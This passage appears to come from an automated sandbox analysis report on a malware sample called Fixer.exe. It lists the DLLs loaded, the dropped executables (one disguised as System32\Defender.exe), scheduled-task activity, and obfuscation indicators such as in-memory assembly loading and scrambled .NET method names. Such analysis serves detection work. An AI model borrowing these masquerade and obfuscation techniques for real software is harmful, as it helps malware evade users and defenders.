                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Section loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: apphelp.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: version.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: mswsock.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: schannel.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: version.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: mswsock.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\Defender.exe Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Windows\System32\Defender.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: Fixer.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Fixer.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbKo source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbDib source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System32\Defender.PDB source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdbhnh source: Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: C:\Windows\SYSTEM32\DNSAPI.dll.pdb source: Defender.exe, 0000000B.00000002.2591740114.000000001B580000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: q34e089\mscorlib.pdb source: Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: YTR[^f"ghkb.pdb source: Defender.exe, 0000000B.00000002.2591740114.000000001B5CF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: 0C:\Windows\mscorlib.pdb source: Defender.exe, 0000000B.00000002.2592285856.000000001B778000.00000004.00000010.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: C:\Windows\System32\Defender.PDBn7 source: Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb+i source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: Defender.exe, 0000000B.00000002.2591740114.000000001B580000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2761764861.000000001B100000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp, WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.Management.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: mscorlib.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.Management.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.Core.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbsmx source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbpdbHA source: Defender.exe, 0000000B.00000002.2592285856.000000001B778000.00000004.00000010.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: indoC:\Windows\mscorlib.pdb source: Defender.exe, 0000000B.00000002.2592285856.000000001B778000.00000004.00000010.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb 3 source: Defender.exe, 0000000B.00000002.2591740114.000000001B5CF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr

                  Data Obfuscation

                  Source: 6z9uno0baqvej0me.exe.0.dr, XvtqplFAmRakHnvLtpT.cs .Net Code: KkakfDiBwfKYVVbOUQ System.AppDomain.Load(byte[])
                  Source: 6z9uno0baqvej0me.exe.0.dr, XvtqplFAmRakHnvLtpT.cs .Net Code: KkakfDiBwfKYVVbOUQ
                  Source: 6z9uno0baqvej0me.exe.0.dr, FeMXZbEkIGjJgevW.cs .Net Code: roZsWKRBZOrvYxlj System.Reflection.Assembly.Load(byte[])
                  Source: FixerNerest.exe.0.dr, GprCBzVajSFPhcvMz.cs .Net Code: NMmrnMiPoxTKxWYciysWlr System.Reflection.Assembly.Load(byte[])
                  Source: FixerNerest.exe.0.dr, EwsvuuRydySCmvfwUdTl.cs .Net Code: FyRyFitGWcSvLUVgQQryVi System.AppDomain.Load(byte[])
                  Source: FixerNerest.exe.0.dr, EwsvuuRydySCmvfwUdTl.cs .Net Code: FyRyFitGWcSvLUVgQQryVi
                  Source: Defender.exe.4.dr, GprCBzVajSFPhcvMz.cs .Net Code: NMmrnMiPoxTKxWYciysWlr System.Reflection.Assembly.Load(byte[])
                  Source: Defender.exe.4.dr, EwsvuuRydySCmvfwUdTl.cs .Net Code: FyRyFitGWcSvLUVgQQryVi System.AppDomain.Load(byte[])
                  Source: Defender.exe.4.dr, EwsvuuRydySCmvfwUdTl.cs .Net Code: FyRyFitGWcSvLUVgQQryVi
                  Source: Fixer.exe Static PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Code function: 3_2_00007FF848F200BD pushad ; iretd 3_2_00007FF848F200C1
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Code function: 3_2_00007FF848F22EF2 push FFFFFFE8h; ret 3_2_00007FF848F22EF9
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Code function: 4_2_00007FF848F38169 push ebx; ret 4_2_00007FF848F3816A
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Code function: 4_2_00007FF848F300BD pushad ; iretd 4_2_00007FF848F300C1
                  Source: C:\Windows\System32\Defender.exe Code function: 11_2_00007FF848F28169 push ebx; ret 11_2_00007FF848F2816A
                  Source: C:\Windows\System32\Defender.exe Code function: 11_2_00007FF848F200BD pushad ; iretd 11_2_00007FF848F200C1
                  Source: C:\Windows\System32\Defender.exe Code function: 17_2_00007FF848F28169 push ebx; ret 17_2_00007FF848F2816A
                  Source: 6z9uno0baqvej0me.exe.0.dr, bRFnUZCCzOQQktsWRhAHLOd.csHigh entropy of concatenated method names: 'TGSpzALbonWVUFvPhnynv', 'aYLwQxxWgMnTUO', 'MCzCpbwXWCLl', 'aYPqqEfteDjNeSHJiBlgI', 'lzkGndBotELMvIxw', 'PjOhyPoLIpOoBaEbFm', 'GkRBrpKfBRXyMlY', 'xunnjvueonAsdHkq', 'gqsxhWrnjmulqBCc', 'GhRzhKpmNDp'
                  Source: 6z9uno0baqvej0me.exe.0.dr, ETYzyWSLPrOWhkiLrBuXTiPY.csHigh entropy of concatenated method names: 'oOWCJmYcQnvjThiXoz', 'ihhMfqXbAabVEzYJI', 'JFEqtQwnbXULzejrptHBrLmL', 'CpSrkuXabftSsnQPr', 'zGoawmMJeCGFxT', 'TrbevrdxlYzpYxGqmzxnEib', 'ffaQUTWhaZZvplwXWJDCxwn', 'YMUFAfokPiyQR', 'cSCRPzYKBBCZR', 'fZvirOsIyQhukogGmgGJglAg'
                  Source: 6z9uno0baqvej0me.exe.0.dr, LRPADrZpfFFGcDsfIXCuiNHyQ.csHigh entropy of concatenated method names: '_003CRun_003Eb__1_0', 'MVeqnrHUVu', 'JPRxKQjqNiQvhhLWOJIH', 'NtWrdHcWXWDpoPep', 'ZGRNcTvawIbVsLMnPvWvGhI', 'TpMNGsRhgWjB', 'FkaaRgzBBeKqCZTHtlrxKu', 'GiUDrtoWbKxJLwVpAJFSL', 'WDTyZmksEe', 'yTrxcIHMHifFP'
                  Source: 6z9uno0baqvej0me.exe.0.dr, PthsnsfGDgeBRScSJU.csHigh entropy of concatenated method names: 'WPvtoNyDLTEGaSogXzMEc', 'kzIqtnFcyd', 'EDdQWEFDXUaxCBQpXUsAf', 'VfvlxTKxiVbT', 'PLQAvHAFgJCFocyi', 'GcHvhxUkGltZ', 'EVjfBeGTwseCpVtgIqMPa', 'zMahNwQoWHgvEg', 'JbTboJkctscaExug', 'KpWWETQKDIWXW'
                  Source: 6z9uno0baqvej0me.exe.0.dr, xqLvAWoeLo.csHigh entropy of concatenated method names: 'CdUisxkdFkFeaDfLWDmvGKKb', 'BzDhNhZlzFIpfXjDqWRsL', 'rULSaZsqrTsxqxhwsCfsb', 'XWqgDsPosiYRHiWvHztJNowhg', 'VtePMSIswobuWAaDaJYYp', 'awvfzRliaJzRXVJdWFIPmhTMd', 'jJOmJHwWThTgTrHNOSvFdEu', 'nSQaMtdiCGibUnzrVBCcJpmRH', 'SBRYPfPRyqrVJaDle', 'JftaSDjbBRmyg'
                  Source: 6z9uno0baqvej0me.exe.0.dr, GwWhqodDdzluu.csHigh entropy of concatenated method names: 'IvIOGuRhWYFMuHjkQGxan', 'HaLHdRFAtRAByccwKJtZa', 'betVTtifxUzXoiDzRzbVeoLtI', 'ITvngOKKygNH', 'MSOUfCbousLstxESmTAMMlOjJ', 'kMdjWlJBODQUfqhSNbkunR', 'rMNNulbDfKs', 'OKKWairiBCSnKfu', 'nzPATGmXIYPQnAlKn', 'SHCEJLviEptaDOrEP'
                  Source: 6z9uno0baqvej0me.exe.0.dr, mDQHYyyDgioFBJZV.csHigh entropy of concatenated method names: 'yJRtvjLKoz', 'uGmefcsTfwexqBNYFzT', 'CsUetdcqUExkzUJawJZZQFpE', 'MbrhLGKUDbBlIlCz', 'zayuyWsnbv', 'ufwCQKgBkJIynPwsIo', 'XXZOGPFZOFztjKkaYeyVxE', 'PtqcLfCdjz', 'XCUQqnKkSwkPZnDoYOKTqT', 'KVPnuuMbQuvnhFHnK'
                  Source: 6z9uno0baqvej0me.exe.0.dr, iEyzZzYuVgHBHuvSVDszSVn.csHigh entropy of concatenated method names: 'DmzaqXtfORSlWFCGyP', 'lfPhiSWydevaNQWwnzxExmcnp', 'JwQAlBCYBwnFRITZQB', 'rFUAJPGAKzzDcrG', 'aicsuXpPaIii', 'lYWbUyWovHlfBrYBtKNLzs', 'nIYTQFZAhXLZbdbItjTearM', 'gQNhyUXpshjSvfGjWHDHqRx', 'RCTcfNQvvfmzrsCMA', 'gtuJMOckITnFCOTp'
                  Source: 6z9uno0baqvej0me.exe.0.dr, yPMoFGhLUJIDtqrdoF.csHigh entropy of concatenated method names: 'AvNubljotLBITSjnNSJvirWcI', 'HgspljehAflVlDV', 'ozSAolKCeLeJRJZ', 'lJeCvDZRdmSDCrgFZPDWJ', 'dVWpKaEUPqGA', 'cZSWkaAXBSGAmeYjBFCb', 'fIgGtzNIWbxBIEgGsTw', 'kbDQpYvflNlE', 'FwRmQranOfrIzeZsd', 'mFStEFQQUDhX'
                  Source: 6z9uno0baqvej0me.exe.0.dr, KZBUhkwxZIxgGTHyBUdIA.csHigh entropy of concatenated method names: 'qihQwZMWKRbXaA', 'vzbnqyYoZdKgkd', 'hekvjSnQoWkDygEi', 'GlGVCUJQRuInlscsokxnfRu', 'inQFuaIUvRay', 'AfKbfRYedCdIKJvHv', 'pqxmOEEVqlosUS', 'VoFnLzzVdElmxjRMMzD', 'HZNQGXKbmqliKepVqUjOq', 'ThdRGlZZcsQiVvao'
                  Source: 6z9uno0baqvej0me.exe.0.dr, MKCDlISAepQIcIwuZXoEk.csHigh entropy of concatenated method names: 'nHEaTzoWxQZ', 'AFjLdhQolFyaNVhcozCG', 'IXuzKpTMHs', 'jvIrKOuGnv', 'hJdNyRMiyOTerho', 'TsxcdMyrRMpRZ', 'vSGqplVwqBz', 'tmQRRKVCaNqSoVKmv', 'bvJtSAYBrDqWCwcESMbAv', 'vWdhcoBUajAEZEPATPs'
                  Source: 6z9uno0baqvej0me.exe.0.dr, BtukVaynkFNDYhxzrBxPukEK.csHigh entropy of concatenated method names: 'LDSFFMGTtUhoJCk', 'sLtZydnlXBapozRpkTKX', 'iftHjeNQKhzMhCYKlRh', 'hhDmQfuDrEprNCJ', 'ARPyZUMUacGwsfyCdGx', 'bHqEkJYGrH', 'essJTCiqMVjLoYxLMFnOGFJEs', 'KOQwFcTdcEzVfAuQlf', 'wCgmxLBEtsZjoRtrUZPPGrL', 'tMqanUqUdLwYecSlEXakCVLE'
                  Source: 6z9uno0baqvej0me.exe.0.dr, iVqXiRRWbtTaFgrOCj.csHigh entropy of concatenated method names: 'YJwawjgILPSRH', 'bbkjAnvjKbzCCwZtLGH', 'VTlvtnCJFGJcMudE', 'fBvPpyVauhji', 'ELJnKHqppNkleES', 'pISUmgFMEgVQUzFSa', 'CxTZjWOSqnLdLtDDFZQOfY', 'xjemaVqHSLq', 'UEQYwFUpRA', 'UbMRugBMHerVpFjoxz'
                  Source: 6z9uno0baqvej0me.exe.0.dr, XvtqplFAmRakHnvLtpT.csHigh entropy of concatenated method names: 'pvkIPFGCSkUuaiSakf', 'DDDjqbzHeeclvgGp', 'KkakfDiBwfKYVVbOUQ', 'lMtgQxbXqzZOUsrPz', 'kYAUhuvpjJJ', 'WbQjDPQDJn', 'fsCXRqgdFbI', 'rWRezkbOROpcxxlobyvvw', 'UcfWeyCgDYOrYMml', 'SiZmRCaZTErBGfN'
                  Source: 6z9uno0baqvej0me.exe.0.dr, ZAbCfCqEpIJbZTdz.csHigh entropy of concatenated method names: 'lMkuXZVQmvhalwPheBIO', 'CtuNkNjquMbXlNsBaCaF', 'sHJdDMtuuRVlziTqhmMla', 'iFDAjXgEzhIxKmkjgAqvzuG', 'meYKtPOTLzYEaDdWOpSnc', 'YgGxFLveso', 'ROEyVKjTolKOgJdWUhKcSJkGs', 'wKCXgGkFJpZ', 'sfiUnQNSZncpbwiLf', 'dxGROZQRFDeb'
                  Source: 6z9uno0baqvej0me.exe.0.dr, BeNEQBpvCUYMUQvO.csHigh entropy of concatenated method names: 'XmhJotRMrlZrDmPUAPXFV', 'FfmVReXiQT', 'fdcMNMlvsYQQ', 'zhJsTAXIPVg', 'WTbnoJVGjX', 'mHnCmKdepPjV', 'UfOPvzQIvKqtJHDOvJTcY', 'kgykxlqrmnxrTJvFK', 'GArxwIcDZPtFPtLxuhQLB', 'RDXDwSouTpzkVYfnjpH'
                  Source: 6z9uno0baqvej0me.exe.0.dr, kvAdeNHhLAvFBnSPLsjXnmuh.csHigh entropy of concatenated method names: 'KkybJPQqfTa', 'wipTLzNCqsPo', 'CNYRIyBSZUdIGClePVTrGOJtE', 'mhfNRUKeGBsYXVZqXO', 'KExbXbXvwqoDf', 'gLTnMCIybvkmq', 'ySQqvguXpGImuZNoSxMLrJFCL', 'DLcBqkkYxdaxI', 'SIWNfZIjlndnaeHpNNfjdjuoP', 'BWbjNUoOtinsXlDUa'
                  Source: 6z9uno0baqvej0me.exe.0.dr, NmTBqnwpsuQacpSXxPF.csHigh entropy of concatenated method names: 'xuQERGGdzsmey', 'cVTmmTFkOSqSyIviF', 'ZXhTWOjjhTp', 'IlbFMwDLcm', 'MfxNzHxhRmh', 'apJzFCCmmuO', 'EqtvyeucnRVnY', 'kbjmYObhAP', 'xyJZzTSRnI', 'OBimsERJUWaE'
                  Source: 6z9uno0baqvej0me.exe.0.dr, FeMXZbEkIGjJgevW.csHigh entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'SWUgQdUHKXCuFjoLy', 'roZsWKRBZOrvYxlj', 'OvZynxCHmSjPwJch', 'PJyZAKOPDFP', 'zFJWOaQYWErWkj', 'hldEPNUhbkvNlLjjrnsnNat', 'jMJhLSbpQSgdaBzBeXil', 'MeNnUzirweHsvVD', 'mWIJFxTeGJq'
                  Source: 6z9uno0baqvej0me.exe.0.dr, YCqdhaRTimJInloXKuRkyyz.csHigh entropy of concatenated method names: 'uMCOJPwusgMn', 'PTXkYSNOqJWmprPoquZDj', 'VYCJTqPPHYBluatzagls', 'CfcUXhGClmj', 'gyzhOzXzbB', 'kDxovrUtSrfSsapvIJNVlRiNc', 'RMhOtcAirQatLKQtRLAfHHYD', 'pNgLSVjLBZIMEx', 'RKjZVPxCEs', 'XMxmKndzDO'
                  Source: 6z9uno0baqvej0me.exe.0.dr, DqloyPCLKAxwlGUiNTrkNgO.csHigh entropy of concatenated method names: '_003CCheckWMI_003Eb__4_0', 'gHevnUUNJwNuWDCjJuZrjVqjS', 'lOeaFCHQdWAhvAN', 'AQZpTbUtpQex', 'KRucUiFjjqLmFa', 'ibyZeaVZKdyKulkoXJC', 'FFEbRHYQZNDOBpK', 'SFTnprkzVYLyzB', 'cDHadWXHWCEAwakJFaWWRq', 'dOUFFtwZRXZaKt'
                  Source: 6z9uno0baqvej0me.exe.0.dr, FaWSNiFOezDcTYVZCPLVUHimA.csHigh entropy of concatenated method names: 'aFVOrfwcWXAYK', 'QIRzuExzUkYGtUfysk', 'AHztQIYfqCyYeEj', 'MqirvPallpk', 'cxYfQFKTROBrWYGwVLuCK', 'SHJsWkhOHaXnDt', 'THYuPnxprVXJdPavibN', 'QVYjZmCHbUiVNSCDWHu', 'USRWzbDyhfpMqNNxjp', 'dkqNWnBvLNWYagkK'
                  Source: 6z9uno0baqvej0me.exe.0.dr, VyUkcpVGFrRjScwyVUzGJWx.csHigh entropy of concatenated method names: 'OePLlmVmuhYaBYdb', 'gqiCsQpYwtMwaj', 'BxVxZJVTVeolEVwxrXrcgPUVO', 'notJpUyZZECfCFLXMX', 'fkCAwVYiGSl', 'AjzWgZMpUnewsuLVmRI', 'wRjpkownQm', 'GnaCwCifxzijrFGHBKDwpKj', 'iAKlrcZYivYIRsPTElKC', 'hrjegvdNpCwEtT'
                  Source: 6z9uno0baqvej0me.exe.0.dr, UsOroEkJQwDdcBlH.csHigh entropy of concatenated method names: 'tZXWLhbpGPMmxia', 'gBfOIplZEVfpAhsPo', 'gTNzJKmBhpYXSO', 'DvzGsJEoySqClpZWwxj', 'GMhsVbHHwA', 'CRLwltJwEbePhTIBLISc', 'jMWrOHlQCwrxkolZt', 'dmAfabwzYMavzeYHTFpEWl', 'gCfnSxfWbSUoqYDmu', 'PiYpGwNYcUgkpQsNUduoeCtq'
